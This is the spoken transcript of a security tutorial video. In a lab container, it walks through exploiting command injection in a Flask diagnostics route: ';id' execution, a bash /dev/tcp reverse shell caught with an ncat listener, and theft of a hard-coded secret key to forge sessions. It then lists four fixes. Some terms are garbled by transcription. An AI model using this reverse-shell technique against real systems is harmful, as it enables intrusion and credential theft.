Welcome to video 2 of the AquaGate security series. In video 1, we stole a session cookie using cross-site scripting. Now we're going deeper, from a URL parameter to an interactive shell inside the container. This is v4, command injection. Let's set the stage. In video 1, our attack stayed at the HTTP layer. We targeted the user's session and stole a cookie with JavaScript. In video 2, we're targeting the server process itself. Instead of stealing a cookie, we'll use unsanitized input that reaches subprocess with shell equals true, getting an interactive shell with full file system access. One important note, we're getting a shell inside the AquaGate container, not the host machine, but that's still extremely dangerous. Before we exploit anything, let's understand two shell types. A bind shell means the attacker connects inward to a port the target opens, but firewalls usually block inbound connections. A reverse shell flips it. The target calls out to the attacker. Outbound traffic is rarely blocked. In our demo, the AquaGate container will call out to the attacker container on port 4444 over the Docker network. v4 command injection. User input passed directly to the shell, from a URL parameter to an interactive shell inside the container. Here's the vulnerability. The /diagnostics route takes a host parameter from the URL and builds a ping command using an f-string, then passes it to subprocess.checksescork output with shell equals true. That's the critical mistake. It hands the entire string to /bin/sh, which means semicolons, pipes, and backticks are shell operators, not data. So when we append ;ID to the host, the shell receives two commands, ping, then ID, both execute. Let's see simple code execution live. We'll visit the diagnostics page, show it working normally, and then append ;ID to the host field. Watch the output. Right after the ping results, you'll see the ID command execute. Here's the diagnostics page with a normal ping to wu7.1. One packet sent, one received. This is the intended functionality. Now with ;ID appended to the host parameter, the ping still runs, but right after the ping statistics, we see UID equals 0 root. We just executed an arbitrary command through a URL parameter. That's remote code execution. The injected ID command ran as root inside the container. We can read the file system with cat/etc/passwd, read the application source, dump all environment variables, anything the Flask process can do. But this is just a stepping stone. The real payload gives us interactive access. Let's break down the bash one-liner. Bash-i starts an interactive shell. /dev/tcp/attacker/4444 is a Linux kernel feature that opens a TCP socket to the attacker container on port 4444. The greater than ampersand redirects both stdout and stdir into that socket, so output goes to the attacker. And 0 greater than ampersand 1 redirects stdin from the socket, so the attacker's keystrokes come back in. We deliver this via curl, URL encoding the special characters. Time to land the shell. In Terminal 2, we'll start the ncat listener on the attacker container. Then from Terminal 3, we send the reverse shell payload via curl. Watch Terminal 2. The AquaGate container will call in, and we'll get a root prompt. The ncat listener is running on the attacker container, waiting on port 4444. Now we trigger the reverse shell payload from a second terminal. The connection arrived. ncat reports a connection from the AquaGate container's IP. We now have an interactive root prompt inside the AquaGate container. Running a few commands inside the shell, wummy confirms root, hostname gives us the container ID, not the host machine, and n filtered by key reveals the hard-coded secret key. With this, an attacker could forge session cookies for any user. That's what landing a shell looks like. We're root inside the AquaGate container. The hostname is the container ID, confirming we're not on the host machine. And immediately visible in the environment, secret key equals AquaGate dev key 2019, the hard-coded Flask secret. A real attacker could use that key to forge session cookies for any user, including the admin, without knowing their password. The bash one-liner is our primary payload, but the same injection point works with other languages. The Python 3 one-liner achieves the same result using socket and subprocess, useful when bash isn't available. Same injection point, same result, an interactive root shell at /app. 4 fixes close this vulnerability. First and most important, pass subprocess a list instead of a string and set shell equals false. This eliminates the shell interpreter entirely. The semicolon becomes just data. Second, validate the host parameter and reject anything that doesn't look like a valid IP or host name. Third, add login required to the diagnostics route. And fourth, run the application as a non-root user in the Docker file, so even if injection happens, the attacker doesn't land as root. End of video 2. V1 through V4 are exploited: cross-site scripting, session fixation, session replay, and command injection. Video 3 covers the remaining 3: missing authentication on admin routes, worksug debug mode exposure, and missing input validation with a race condition, followed by a side-by-side walkthrough of all 7 fixes in the secure version.